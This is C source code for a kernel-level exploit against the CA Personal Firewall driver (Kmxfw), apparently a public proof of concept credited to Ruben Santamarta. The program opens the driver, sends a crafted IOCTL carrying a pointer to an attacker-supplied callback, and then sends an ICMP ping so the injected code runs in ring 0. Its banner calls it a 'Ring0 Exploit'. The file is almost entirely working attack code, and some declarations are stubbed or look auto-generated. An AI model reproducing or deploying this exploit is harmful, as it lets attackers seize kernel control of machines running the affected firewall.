
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int VOID ;
typedef int SendData ;
typedef int (* PIcmpSendEcho2 ) (scalar_t__,int *,int *,int *,int ,char*,int,int *,int *,int,int) ;
typedef scalar_t__ (* PIcmpCreateFile ) () ;
typedef int * LPVOID ;
typedef int ICMP_ECHO_REPLY ;
typedef scalar_t__ HANDLE ;
typedef int DWORD ;


 scalar_t__ CreateFile (char*,int ,int ,int *,int,int ,int ) ;
 int DeviceIoControl (scalar_t__,int,int *,int,int *,int,int*,int *) ;
 scalar_t__ GetProcAddress (int ,char*) ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int LoadLibrary (char*) ;
 scalar_t__ Ring0Function ;
 int ShowError () ;
 int exit (int) ;
 int inet_addr (char*) ;
 scalar_t__ malloc (int) ;
 int printf (char*,...) ;
 int strcmp (char*,char*) ;
 int system (char*) ;

int main(int argc, char *argv[])
{

 DWORD *OutBuff,*InBuff;
 DWORD CallBacks[4];
 DWORD dwIOCTL,OutSize,InSize,junk,i,dwRetVal;
 HANDLE hDevice;
 PIcmpSendEcho2 IcmpSendEcho2;
 PIcmpCreateFile IcmpCreateFile;
 LPVOID ReplyBuffer;
 HANDLE hIcmpFile;
 char *SendData = "owned!";



 if(argc<2)
 {
  printf("\nusage> exploit.exe  2K or XP\n");
  exit(1);
 }

 if(!strcmp(argv[1],"2K"))
 {
  IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("icmp.dll")
             ,"IcmpSendEcho2");
  IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("icmp.dll")
                                                  ,"IcmpCreateFile");
 }
 else
{
  IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("iphlpapi.dll")
             ,"IcmpSendEcho2");
  IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("iphlpapi.dll")
                                                 ,"IcmpCreateFile");
}

system("cls");
printf("############################\n");
printf("### CA Personal Firewall ###\n");
printf("##### - Ring0 Exploit - ####\n");
printf("############################\n");
printf("Ruben Santamarta\nwww.reversemode.com\n\n");




hDevice = CreateFile("\\\\.\\Kmxfw",
                     0,
                     0,
                     ((void*)0),
                     3,
                     0,
                     0);





 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 printf("[!] Kmxfw Device Handle [%x]\n",hDevice);




 OutSize = 0x44;

 OutBuff = (DWORD *)malloc(OutSize);




 dwIOCTL = 0x85000014;
 printf("[!] Injecting Malicious Callback\n",dwIOCTL);
 CallBacks[0]=0;
 CallBacks[1]=(DWORD)Ring0Function;
 CallBacks[2]=0;

 OutBuff[0]=(DWORD)CallBacks;
 OutBuff[1]=(DWORD)CallBacks;
 OutBuff[2]=(DWORD)CallBacks;


 DeviceIoControl(hDevice,
                 dwIOCTL,
                 (LPVOID)OutBuff,0x10,
                 (LPVOID)OutBuff,0x44,
                 &junk,
                 ((void*)0));

 printf("[!] Pinging google\n\t->Executing Ring0 Function\n");
 hIcmpFile=IcmpCreateFile();
 ReplyBuffer = (VOID*) malloc(sizeof(ICMP_ECHO_REPLY) + sizeof(SendData));
 IcmpSendEcho2(hIcmpFile,
                    ((void*)0),
                    ((void*)0),
                    ((void*)0),
                    inet_addr("66.102.9.99"),
                    SendData,
                    sizeof(SendData),
                    ((void*)0),
                    ReplyBuffer,
                    8*sizeof(SendData) + sizeof(ICMP_ECHO_REPLY),
                    1000);


}
